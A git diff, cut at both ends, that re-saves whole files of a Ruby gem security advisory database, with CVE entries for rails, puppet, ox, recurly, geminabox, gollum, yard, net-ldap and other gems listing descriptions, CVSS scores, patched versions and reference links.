-  - "~> 3.2.17"
-  - "~> 4.0.3"
-  - "~> 4.1.0.beta2"
-  - ">= 4.1.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-0081
-    - http://lists.opensuse.org/opensuse-updates/2014-02/msg00081.html
-    - http://openwall.com/lists/oss-security/2014/02/18/8
-    - http://rhn.redhat.com/errata/RHSA-2014-0215.html
-    - http://rhn.redhat.com/errata/RHSA-2014-0306.html
-    - https://web.archive.org/web/20140911141416/http://www.securitytracker.com/id/1029782
-    - https://web.archive.org/web/20170307202606/http://www.securityfocus.com/bid/65647
-    - https://github.com/advisories/GHSA-m46p-ggm5-5j83
-    - https://github.com/rails/rails/commit/08d0a11a3f62718d601d39e617c834759cf59bbb
----
+---
+layout: advisory
+title: 'CVE-2014-0081 (rails): Rails vulnerable to Cross-site Scripting'
+comments: false
+categories:
+- rails
+advisory:
+  gem: rails
+  cve: 2014-0081
+  ghsa: m46p-ggm5-5j83
+  url: https://github.com/rails/rails/commit/08d0a11a3f62718d601d39e617c834759cf59bbb
+  title: Rails vulnerable to Cross-site Scripting
+  date: 2017-10-24
+  description: |
+    Multiple cross-site scripting (XSS) vulnerabilities in
+    "actionview/lib/action_view/helpers/number_helper.rb"
+    in Ruby on Rails before 3.2.17, 4.0.x before 4.0.3, and 4.1.x before 4.1.0.beta2
+    allow remote attackers to inject arbitrary web script or HTML via the
+    (1) format, (2) negative_format, or (3) units parameter to the
+    (a) number_to_currency, (b) number_to_percentage, or (c) number_to_human helper.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.2.17"
+  - "~> 4.0.3"
+  - "~> 4.1.0.beta2"
+  - ">= 4.1.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-0081
+    - http://lists.opensuse.org/opensuse-updates/2014-02/msg00081.html
+    - http://openwall.com/lists/oss-security/2014/02/18/8
+    - http://rhn.redhat.com/errata/RHSA-2014-0215.html
+    - http://rhn.redhat.com/errata/RHSA-2014-0306.html
+    - https://web.archive.org/web/20140911141416/http://www.securitytracker.com/id/1029782
+    - https://web.archive.org/web/20170307202606/http://www.securityfocus.com/bid/65647
+    - https://github.com/advisories/GHSA-m46p-ggm5-5j83
+    - https://github.com/rails/rails/commit/08d0a11a3f62718d601d39e617c834759cf59bbb
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2014-3248.md b/advisories/_posts/2017-10-24-CVE-2014-3248.md
index 0c790ee0..e34bfdcb 100644
--- a/advisories/_posts/2017-10-24-CVE-2014-3248.md
+++ b/advisories/_posts/2017-10-24-CVE-2014-3248.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2014-3248 (puppet): Moderate severity vulnerability that affects facter,
-  hiera, mcollective-client, and puppet'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2014-3248
-  ghsa: 92v7-pq4h-58j5
-  url: https://github.com/advisories/GHSA-92v7-pq4h-58j5
-  title: Moderate severity vulnerability that affects facter, hiera, mcollective-client,
-    and puppet
-  date: 2017-10-24
-  description: |
-    Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7,
-    Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera
-    before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier,
-    allows local users to gain privileges via a Trojan horse file in the current working
-    directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2)
-    Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so;
-    or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so
-    in puppet/confine.
-  patched_versions:
-  - "~> 2.7.26"
-  - ">= 3.6.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-3248
-    - https://github.com/advisories/GHSA-92v7-pq4h-58j5
-    - http://puppetlabs.com/security/cve/cve-2014-3248
-    - http://rowediness.com/2014/06/13/cve-2014-3248-a-little-problem-with-puppet/
-    - http://secunia.com/advisories/59197
-    - http://secunia.com/advisories/59200
-    - http://www.securityfocus.com/bid/68035
-    - https://github.com/rubysec/ruby-advisory-db/issues/238
-    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/elevation-privileges-untrusted-search/ruby/sid-1586/summary
----
+---
+layout: advisory
+title: 'CVE-2014-3248 (puppet): Moderate severity vulnerability that affects facter,
+  hiera, mcollective-client, and puppet'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2014-3248
+  ghsa: 92v7-pq4h-58j5
+  url: https://github.com/advisories/GHSA-92v7-pq4h-58j5
+  title: Moderate severity vulnerability that affects facter, hiera, mcollective-client,
+    and puppet
+  date: 2017-10-24
+  description: |
+    Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7,
+    Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera
+    before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier,
+    allows local users to gain privileges via a Trojan horse file in the current working
+    directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2)
+    Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so;
+    or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so
+    in puppet/confine.
+  patched_versions:
+  - "~> 2.7.26"
+  - ">= 3.6.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-3248
+    - https://github.com/advisories/GHSA-92v7-pq4h-58j5
+    - http://puppetlabs.com/security/cve/cve-2014-3248
+    - http://rowediness.com/2014/06/13/cve-2014-3248-a-little-problem-with-puppet/
+    - http://secunia.com/advisories/59197
+    - http://secunia.com/advisories/59200
+    - http://www.securityfocus.com/bid/68035
+    - https://github.com/rubysec/ruby-advisory-db/issues/238
+    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/elevation-privileges-untrusted-search/ruby/sid-1586/summary
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2016-7798.md b/advisories/_posts/2017-10-24-CVE-2016-7798.md
index 9e486411..0ca99efe 100644
--- a/advisories/_posts/2017-10-24-CVE-2016-7798.md
+++ b/advisories/_posts/2017-10-24-CVE-2016-7798.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2016-7798 (openssl): Incorrect handling of initialization vector in the
-  GCM mode in OpenSSL'
-comments: false
-categories:
-- openssl
-advisory:
-  gem: openssl
-  cve: 2016-7798
-  ghsa: 6h88-qjpv-p32m
-  url: https://github.com/ruby/openssl/issues/49
-  title: Incorrect handling of initialization vector in the GCM mode in OpenSSL
-  date: 2017-10-24
-  description: |
-    The openssl gem for Ruby uses the same initialization vector (IV) in
-    GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for
-    context-dependent attackers to bypass the encryption protection mechanism.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.0.0"
----
+---
+layout: advisory
+title: 'CVE-2016-7798 (openssl): Incorrect handling of initialization vector in the
+  GCM mode in OpenSSL'
+comments: false
+categories:
+- openssl
+advisory:
+  gem: openssl
+  cve: 2016-7798
+  ghsa: 6h88-qjpv-p32m
+  url: https://github.com/ruby/openssl/issues/49
+  title: Incorrect handling of initialization vector in the GCM mode in OpenSSL
+  date: 2017-10-24
+  description: |
+    The openssl gem for Ruby uses the same initialization vector (IV) in
+    GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for
+    context-dependent attackers to bypass the encryption protection mechanism.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.0.0"
+---
diff --git a/advisories/_posts/2017-10-27-CVE-2017-15928.md b/advisories/_posts/2017-10-27-CVE-2017-15928.md
index 4813a1a5..eb410846 100644
--- a/advisories/_posts/2017-10-27-CVE-2017-15928.md
+++ b/advisories/_posts/2017-10-27-CVE-2017-15928.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2017-15928 (ox): ox ruby gem segmentation fault via parse_obj'
-comments: false
-categories:
-- ox
-advisory:
-  gem: ox
-  cve: 2017-15928
-  ghsa: pjj4-w39g-pw54
-  url: https://github.com/ohler55/ox/issues/194
-  title: ox ruby gem segmentation fault via parse_obj
-  date: 2017-10-27
-  description: |
-    In the Ox gem 2.8.0 for Ruby, the process crashes with a segmentation
-    fault when a crafted input is supplied to parse_obj. NOTE: the vendor has stated
-    "Ox should handle the error more gracefully" but has not confirmed a security implication.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.8.1"
----
+---
+layout: advisory
+title: 'CVE-2017-15928 (ox): ox ruby gem segmentation fault via parse_obj'
+comments: false
+categories:
+- ox
+advisory:
+  gem: ox
+  cve: 2017-15928
+  ghsa: pjj4-w39g-pw54
+  url: https://github.com/ohler55/ox/issues/194
+  title: ox ruby gem segmentation fault via parse_obj
+  date: 2017-10-27
+  description: |
+    In the Ox gem 2.8.0 for Ruby, the process crashes with a segmentation
+    fault when a crafted input is supplied to parse_obj. NOTE: the vendor has stated
+    "Ox should handle the error more gracefully" but has not confirmed a security implication.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.8.1"
+---
diff --git a/advisories/_posts/2017-10-29-CVE-2017-16229.md b/advisories/_posts/2017-10-29-CVE-2017-16229.md
index 68f21a81..c29165de 100644
--- a/advisories/_posts/2017-10-29-CVE-2017-16229.md
+++ b/advisories/_posts/2017-10-29-CVE-2017-16229.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2017-16229 (ox): ox ruby gem stack overflow in sax_parse'
-comments: false
-categories:
-- ox
-advisory:
-  gem: ox
-  cve: 2017-16229
-  ghsa: wfwm-chj7-w59r
-  url: https://github.com/ohler55/ox/issues/195
-  title: ox ruby gem stack overflow in sax_parse
-  date: 2017-10-29
-  description: |
-    In the Ox gem 2.8.1 for Ruby, the process crashes with a stack-based
-    buffer over-read in the read_from_str function in sax_buf.c when a crafted input
-    is supplied to sax_parse.
-  cvss_v2: 4.3
-  cvss_v3: 5.5
-  patched_versions:
-  - ">= 2.8.2"
----
+---
+layout: advisory
+title: 'CVE-2017-16229 (ox): ox ruby gem stack overflow in sax_parse'
+comments: false
+categories:
+- ox
+advisory:
+  gem: ox
+  cve: 2017-16229
+  ghsa: wfwm-chj7-w59r
+  url: https://github.com/ohler55/ox/issues/195
+  title: ox ruby gem stack overflow in sax_parse
+  date: 2017-10-29
+  description: |
+    In the Ox gem 2.8.1 for Ruby, the process crashes with a stack-based
+    buffer over-read in the read_from_str function in sax_buf.c when a crafted input
+    is supplied to sax_parse.
+  cvss_v2: 4.3
+  cvss_v3: 5.5
+  patched_versions:
+  - ">= 2.8.2"
+---
diff --git a/advisories/_posts/2017-11-03-CVE-2017-16516.md b/advisories/_posts/2017-11-03-CVE-2017-16516.md
index 1dd97686..d9c76f35 100644
--- a/advisories/_posts/2017-11-03-CVE-2017-16516.md
+++ b/advisories/_posts/2017-11-03-CVE-2017-16516.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-16516 (yajl-ruby): Flaw in yajl-ruby gem may cause a DoS'
-comments: false
-categories:
-- yajl-ruby
-advisory:
-  gem: yajl-ruby
-  cve: 2017-16516
-  ghsa: wwh7-4jw9-33x6
-  url: https://nvd.nist.gov/vuln/detail/CVE-2017-16516
-  title: Flaw in yajl-ruby gem may cause a DoS
-  date: 2017-11-03
-  description: |
-    In the yajl-ruby gem 1.3.0 for Ruby, when a crafted JSON file is supplied to
-    Yajl::Parser.new.parse, the whole ruby process crashes with a SIGABRT in the
-    yajl_string_decode function in yajl_encode.c. This results in the whole ruby
-    process terminating and potentially a denial of service.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.3.1"
-  related:
-    url:
-    - https://github.com/brianmario/yajl-ruby/issues/176
----
+---
+layout: advisory
+title: 'CVE-2017-16516 (yajl-ruby): Flaw in yajl-ruby gem may cause a DoS'
+comments: false
+categories:
+- yajl-ruby
+advisory:
+  gem: yajl-ruby
+  cve: 2017-16516
+  ghsa: wwh7-4jw9-33x6
+  url: https://nvd.nist.gov/vuln/detail/CVE-2017-16516
+  title: Flaw in yajl-ruby gem may cause a DoS
+  date: 2017-11-03
+  description: |
+    In the yajl-ruby gem 1.3.0 for Ruby, when a crafted JSON file is supplied to
+    Yajl::Parser.new.parse, the whole ruby process crashes with a SIGABRT in the
+    yajl_string_decode function in yajl_encode.c. This results in the whole ruby
+    process terminating and potentially a denial of service.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.3.1"
+  related:
+    url:
+    - https://github.com/brianmario/yajl-ruby/issues/176
+---
diff --git a/advisories/_posts/2017-11-07-CVE-2017-0904.md b/advisories/_posts/2017-11-07-CVE-2017-0904.md
index accb7d96..2399b52c 100644
--- a/advisories/_posts/2017-11-07-CVE-2017-0904.md
+++ b/advisories/_posts/2017-11-07-CVE-2017-0904.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2017-0904 (private_address_check): private_address_check Ruby Gem Resolv.getaddresses
-  Server-Side Request Forgery'
-comments: false
-categories:
-- private_address_check
-advisory:
-  gem: private_address_check
-  cve: 2017-0904
-  ghsa: hxhj-hp9m-qwc4
-  url: https://github.com/jtdowney/private_address_check/issues/1
-  title: private_address_check Ruby Gem Resolv.getaddresses Server-Side Request Forgery
-  date: 2017-11-07
-  description: |
-    The private_address_check ruby gem before 0.4.0 is vulnerable to a bypass due to use of Ruby's
-    Resolv.getaddresses method, which is OS-dependent and should not be relied upon for security
-    measures, such as when used to blacklist private network addresses to prevent server-side
-    request forgery.
-  cvss_v2: 6.8
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 0.4.0"
----
+---
+layout: advisory
+title: 'CVE-2017-0904 (private_address_check): private_address_check Ruby Gem Resolv.getaddresses
+  Server-Side Request Forgery'
+comments: false
+categories:
+- private_address_check
+advisory:
+  gem: private_address_check
+  cve: 2017-0904
+  ghsa: hxhj-hp9m-qwc4
+  url: https://github.com/jtdowney/private_address_check/issues/1
+  title: private_address_check Ruby Gem Resolv.getaddresses Server-Side Request Forgery
+  date: 2017-11-07
+  description: |
+    The private_address_check ruby gem before 0.4.0 is vulnerable to a bypass due to use of Ruby's
+    Resolv.getaddresses method, which is OS-dependent and should not be relied upon for security
+    measures, such as when used to blacklist private network addresses to prevent server-side
+    request forgery.
+  cvss_v2: 6.8
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 0.4.0"
+---
diff --git a/advisories/_posts/2017-11-09-CVE-2017-0905.md b/advisories/_posts/2017-11-09-CVE-2017-0905.md
index ccd5f5a2..dad92ba0 100644
--- a/advisories/_posts/2017-11-09-CVE-2017-0905.md
+++ b/advisories/_posts/2017-11-09-CVE-2017-0905.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2017-0905 (recurly): SSRF vulnerability in Recurly gem''s Resource#find.'
-comments: false
-categories:
-- recurly
-advisory:
-  gem: recurly
-  cve: 2017-0905
-  ghsa: x27v-x225-gq8g
-  url: https://github.com/recurly/recurly-client-ruby/commit/1bb0284d6e668b8b3d31167790ed6db1f6ccc4be
-  title: SSRF vulnerability in Recurly gem's Resource#find.
-  date: 2017-11-09
-  description: |
-    If you are using the #find method on any of the classes that are derived from
-    the Resource class and you are passing user input into that method, a
-    malicious user can force the http client to reach out to a server under their
-    control. This can lead to leakage of your private API key.
-
-    Because of the severity of impact, we are recommending that all users upgrade
-    to a patched version. We have provided a non-breaking patch for every 2.X
-    version of the client.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 2.0.13"
-  - "~> 2.1.11"
-  - "~> 2.2.5"
-  - "~> 2.3.10"
-  - "~> 2.4.11"
-  - "~> 2.5.3"
-  - "~> 2.6.3"
-  - "~> 2.7.8"
-  - "~> 2.8.2"
-  - "~> 2.9.2"
-  - "~> 2.10.4"
-  - "~> 2.11.3"
-  - ">= 2.12.0"
----
+---
+layout: advisory
+title: 'CVE-2017-0905 (recurly): SSRF vulnerability in Recurly gem''s Resource#find.'
+comments: false
+categories:
+- recurly
+advisory:
+  gem: recurly
+  cve: 2017-0905
+  ghsa: x27v-x225-gq8g
+  url: https://github.com/recurly/recurly-client-ruby/commit/1bb0284d6e668b8b3d31167790ed6db1f6ccc4be
+  title: SSRF vulnerability in Recurly gem's Resource#find.
+  date: 2017-11-09
+  description: |
+    If you are using the #find method on any of the classes that are derived from
+    the Resource class and you are passing user input into that method, a
+    malicious user can force the http client to reach out to a server under their
+    control. This can lead to leakage of your private API key.
+
+    Because of the severity of impact, we are recommending that all users upgrade
+    to a patched version. We have provided a non-breaking patch for every 2.X
+    version of the client.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 2.0.13"
+  - "~> 2.1.11"
+  - "~> 2.2.5"
+  - "~> 2.3.10"
+  - "~> 2.4.11"
+  - "~> 2.5.3"
+  - "~> 2.6.3"
+  - "~> 2.7.8"
+  - "~> 2.8.2"
+  - "~> 2.9.2"
+  - "~> 2.10.4"
+  - "~> 2.11.3"
+  - ">= 2.12.0"
+---
diff --git a/advisories/_posts/2017-11-09-CVE-2017-0909.md b/advisories/_posts/2017-11-09-CVE-2017-0909.md
index 4d1a18df..74b3acff 100644
--- a/advisories/_posts/2017-11-09-CVE-2017-0909.md
+++ b/advisories/_posts/2017-11-09-CVE-2017-0909.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2017-0909 (private_address_check): private_address_check Ruby Gem Blacklist
-  Bypass privilege escalation'
-comments: false
-categories:
-- private_address_check
-advisory:
-  gem: private_address_check
-  cve: 2017-0909
-  ghsa: 3v3c-r5v2-68ph
-  url: https://github.com/jtdowney/private_address_check/pull/3
-  title: private_address_check Ruby Gem Blacklist Bypass privilege escalation
-  date: 2017-11-09
-  description: |
-    The private_address_check ruby gem before 0.4.1 is vulnerable to a bypass due to an incomplete
-    blacklist of common private/local network addresses used to prevent server-side request forgery.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2017-0909 (private_address_check): private_address_check Ruby Gem Blacklist
+  Bypass privilege escalation'
+comments: false
+categories:
+- private_address_check
+advisory:
+  gem: private_address_check
+  cve: 2017-0909
+  ghsa: 3v3c-r5v2-68ph
+  url: https://github.com/jtdowney/private_address_check/pull/3
+  title: private_address_check Ruby Gem Blacklist Bypass privilege escalation
+  date: 2017-11-09
+  description: |
+    The private_address_check ruby gem before 0.4.1 is vulnerable to a bypass due to an incomplete
+    blacklist of common private/local network addresses used to prevent server-side request forgery.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.4.1"
+---
diff --git a/advisories/_posts/2017-11-10-CVE-2017-16792.md b/advisories/_posts/2017-11-10-CVE-2017-16792.md
index f7bb8449..1f2f9254 100644
--- a/advisories/_posts/2017-11-10-CVE-2017-16792.md
+++ b/advisories/_posts/2017-11-10-CVE-2017-16792.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2017-16792 (geminabox): Stored XSS in "geminabox" via injection in Gemspec
-  "homepage" value'
-comments: false
-categories:
-- geminabox
-advisory:
-  gem: geminabox
-  cve: 2017-16792
-  ghsa: 653m-r33x-39ff
-  url: https://github.com/geminabox/geminabox/blob/master/CHANGELOG.md#01310-2017-11-13
-  title: Stored XSS in "geminabox" via injection in Gemspec "homepage" value
-  date: 2017-11-10
-  description: |
-    Stored cross-site scripting (XSS) vulnerability in "geminabox" (Gem
-    in a Box) allows attackers to inject arbitrary web script via a crafted
-    JavaScript URL in the "homepage" value of a ".gemspec" file.
-
-    A ".gemspec" file must be created with a JavaScript URL in the homepage
-    value. This can be used to build a gem for upload to the Geminabox server,
-    in order to achieve stored XSS via the gem hyperlink.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.13.10"
-  related:
-    url:
-    - https://github.com/geminabox/geminabox/commit/f8429a9e364658459add170e4ebc7a5d3b4759e7
-    - https://github.com/geminabox/geminabox/commit/e7e0b16147677e9029f0b55eff6bc6dda52398d4
----
+---
+layout: advisory
+title: 'CVE-2017-16792 (geminabox): Stored XSS in "geminabox" via injection in Gemspec
+  "homepage" value'
+comments: false
+categories:
+- geminabox
+advisory:
+  gem: geminabox
+  cve: 2017-16792
+  ghsa: 653m-r33x-39ff
+  url: https://github.com/geminabox/geminabox/blob/master/CHANGELOG.md#01310-2017-11-13
+  title: Stored XSS in "geminabox" via injection in Gemspec "homepage" value
+  date: 2017-11-10
+  description: |
+    Stored cross-site scripting (XSS) vulnerability in "geminabox" (Gem
+    in a Box) allows attackers to inject arbitrary web script via a crafted
+    JavaScript URL in the "homepage" value of a ".gemspec" file.
+
+    A ".gemspec" file must be created with a JavaScript URL in the homepage
+    value. This can be used to build a gem for upload to the Geminabox server,
+    in order to achieve stored XSS via the gem hyperlink.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.13.10"
+  related:
+    url:
+    - https://github.com/geminabox/geminabox/commit/f8429a9e364658459add170e4ebc7a5d3b4759e7
+    - https://github.com/geminabox/geminabox/commit/e7e0b16147677e9029f0b55eff6bc6dda52398d4
+---
diff --git a/advisories/_posts/2017-11-15-CVE-2017-7475.md b/advisories/_posts/2017-11-15-CVE-2017-7475.md
index 16ccd90e..1955a5a0 100644
--- a/advisories/_posts/2017-11-15-CVE-2017-7475.md
+++ b/advisories/_posts/2017-11-15-CVE-2017-7475.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2017-7475 (cairo): cairo NULL pointer dereference'
-comments: false
-categories:
-- cairo
-advisory:
-  gem: cairo
-  cve: 2017-7475
-  ghsa: 5v3f-73gv-x7x5
-  url: https://bugs.freedesktop.org/show_bug.cgi?id=100763
-  date: 2017-11-15
-  title: cairo NULL pointer dereference
-  description: |
-    Cairo version 1.15.4 is vulnerable to a NULL pointer dereference related
-    to the FT_Load_Glyph and FT_Render_Glyph resulting in an application crash.
-  cvss_v3: 5.5
-  patched_versions:
-  - ">= 1.15.5"
----
+---
+layout: advisory
+title: 'CVE-2017-7475 (cairo): cairo NULL pointer dereference'
+comments: false
+categories:
+- cairo
+advisory:
+  gem: cairo
+  cve: 2017-7475
+  ghsa: 5v3f-73gv-x7x5
+  url: https://bugs.freedesktop.org/show_bug.cgi?id=100763
+  date: 2017-11-15
+  title: cairo NULL pointer dereference
+  description: |
+    Cairo version 1.15.4 is vulnerable to a NULL pointer dereference related
+    to the FT_Load_Glyph and FT_Render_Glyph resulting in an application crash.
+  cvss_v3: 5.5
+  patched_versions:
+  - ">= 1.15.5"
+---
diff --git a/advisories/_posts/2017-11-16-CVE-2014-9489.md b/advisories/_posts/2017-11-16-CVE-2014-9489.md
index a0358288..34e460b6 100644
--- a/advisories/_posts/2017-11-16-CVE-2014-9489.md
+++ b/advisories/_posts/2017-11-16-CVE-2014-9489.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2014-9489 (gollum): gollum and gollum-lib allow remote authenticated users
-  to execute arbitrary code'
-comments: false
-categories:
-- gollum
-advisory:
-  gem: gollum
-  cve: 2014-9489
-  ghsa: q97v-764g-r2rp
-  url: https://github.com/gollum/gollum/issues/913
-  title: gollum and gollum-lib allow remote authenticated users to execute arbitrary
-    code
-  date: 2017-11-16
-  description: |
-    The gollum-grit_adapter Ruby gem dependency in gollum before 3.1.1 and
-    the gollum-lib gem dependency in gollum-lib before 4.0.1 when the string `master`
-    is in any of the wiki documents, allows remote authenticated users to execute arbitrary
-    code via the `-O` or `--open-files-in-pager` flags.
-  cvss_v2: 6.5
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 3.1.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-9489
-    - https://github.com/gollum/gollum/issues/913
-    - https://github.com/gollum/grit_adapter/commit/4520d973c81fecfebbeacd2ef2f1849d763951c7
-    - http://www.openwall.com/lists/oss-security/2015/01/03/19
-    - https://web.archive.org/web/20200229041306/http://www.securityfocus.com/bid/71499
-    - https://github.com/advisories/GHSA-q97v-764g-r2rp
----
+---
+layout: advisory
+title: 'CVE-2014-9489 (gollum): gollum and gollum-lib allow remote authenticated users
+  to execute arbitrary code'
+comments: false
+categories:
+- gollum
+advisory:
+  gem: gollum
+  cve: 2014-9489
+  ghsa: q97v-764g-r2rp
+  url: https://github.com/gollum/gollum/issues/913
+  title: gollum and gollum-lib allow remote authenticated users to execute arbitrary
+    code
+  date: 2017-11-16
+  description: |
+    The gollum-grit_adapter Ruby gem dependency in gollum before 3.1.1 and
+    the gollum-lib gem dependency in gollum-lib before 4.0.1 when the string `master`
+    is in any of the wiki documents, allows remote authenticated users to execute arbitrary
+    code via the `-O` or `--open-files-in-pager` flags.
+  cvss_v2: 6.5
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 3.1.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-9489
+    - https://github.com/gollum/gollum/issues/913
+    - https://github.com/gollum/grit_adapter/commit/4520d973c81fecfebbeacd2ef2f1849d763951c7
+    - http://www.openwall.com/lists/oss-security/2015/01/03/19
+    - https://web.archive.org/web/20200229041306/http://www.securityfocus.com/bid/71499
+    - https://github.com/advisories/GHSA-q97v-764g-r2rp
+---
diff --git a/advisories/_posts/2017-11-16-CVE-2017-1000248.md b/advisories/_posts/2017-11-16-CVE-2017-1000248.md
index 8c4e487a..dcd9805c 100644
--- a/advisories/_posts/2017-11-16-CVE-2017-1000248.md
+++ b/advisories/_posts/2017-11-16-CVE-2017-1000248.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2017-1000248 (redis-store): Unsafe objects can be loaded from Redis'
-comments: false
-categories:
-- redis-store
-advisory:
-  gem: redis-store
-  cve: 2017-1000248
-  ghsa: 2w67-526p-gm73
-  url: https://github.com/redis-store/redis-store/commit/ce13252c26fcc40ed4935c9abfeb0ee0761e5704
-  title: Unsafe objects can be loaded from Redis
-  date: 2017-11-16
-  description: |
-    Redis-store <=v1.3.0 allows unsafe objects to be loaded from Redis via the
-    use of the Marshal serializer.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.4.0"
----
+---
+layout: advisory
+title: 'CVE-2017-1000248 (redis-store): Unsafe objects can be loaded from Redis'
+comments: false
+categories:
+- redis-store
+advisory:
+  gem: redis-store
+  cve: 2017-1000248
+  ghsa: 2w67-526p-gm73
+  url: https://github.com/redis-store/redis-store/commit/ce13252c26fcc40ed4935c9abfeb0ee0761e5704
+  title: Unsafe objects can be loaded from Redis
+  date: 2017-11-16
+  description: |
+    Redis-store <=v1.3.0 allows unsafe objects to be loaded from Redis via the
+    use of the Marshal serializer.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.4.0"
+---
diff --git a/advisories/_posts/2017-11-28-CVE-2017-17042.md b/advisories/_posts/2017-11-28-CVE-2017-17042.md
index e9481d4a..cd50e4fc 100644
--- a/advisories/_posts/2017-11-28-CVE-2017-17042.md
+++ b/advisories/_posts/2017-11-28-CVE-2017-17042.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2017-17042 (yard): Potential arbitrary file read vulnerability in yard
-  server'
-comments: false
-categories:
-- yard
-advisory:
-  gem: yard
-  cve: 2017-17042
-  ghsa: gj4p-3wh3-2rmf
-  url: https://nvd.nist.gov/vuln/detail/CVE-2017-17042
-  title: Potential arbitrary file read vulnerability in yard server
-  date: 2017-11-28
-  description: |
-    lib/yard/core_ext/file.rb in the server in YARD before 0.9.11 does not block
-    relative paths with an initial ../ sequence, which allows attackers to conduct
-    directory traversal attacks and read arbitrary files.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.9.11"
----
+---
+layout: advisory
+title: 'CVE-2017-17042 (yard): Potential arbitrary file read vulnerability in yard
+  server'
+comments: false
+categories:
+- yard
+advisory:
+  gem: yard
+  cve: 2017-17042
+  ghsa: gj4p-3wh3-2rmf
+  url: https://nvd.nist.gov/vuln/detail/CVE-2017-17042
+  title: Potential arbitrary file read vulnerability in yard server
+  date: 2017-11-28
+  description: |
+    lib/yard/core_ext/file.rb in the server in YARD before 0.9.11 does not block
+    relative paths with an initial ../ sequence, which allows attackers to conduct
+    directory traversal attacks and read arbitrary files.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.9.11"
+---
diff --git a/advisories/_posts/2017-12-17-CVE-2017-17718.md b/advisories/_posts/2017-12-17-CVE-2017-17718.md
index 6a9e0f01..49cccee4 100644
--- a/advisories/_posts/2017-12-17-CVE-2017-17718.md
+++ b/advisories/_posts/2017-12-17-CVE-2017-17718.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-17718 (net-ldap): No validation of hostname certificate in net-ldap'
-comments: false
-categories:
-- net-ldap
-advisory:
-  gem: net-ldap
-  cve: 2017-17718
-  ghsa: m7p8-9w66-9frm
-  url: https://github.com/ruby-ldap/ruby-net-ldap/issues/258
-  title: No validation of hostname certificate in net-ldap
-  date: 2017-12-17
-  description: |
-    The Net::LDAP (aka net-ldap) gem before 0.16.0 for Ruby has Missing SSL
-    Certificate Validation. The LDAP server's certificate was not verified
-    to match the host it was supposed to be connecting to.
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 0.16.0"
-  related:
-    url:
-    - https://github.com/ruby-ldap/ruby-net-ldap/pull/279
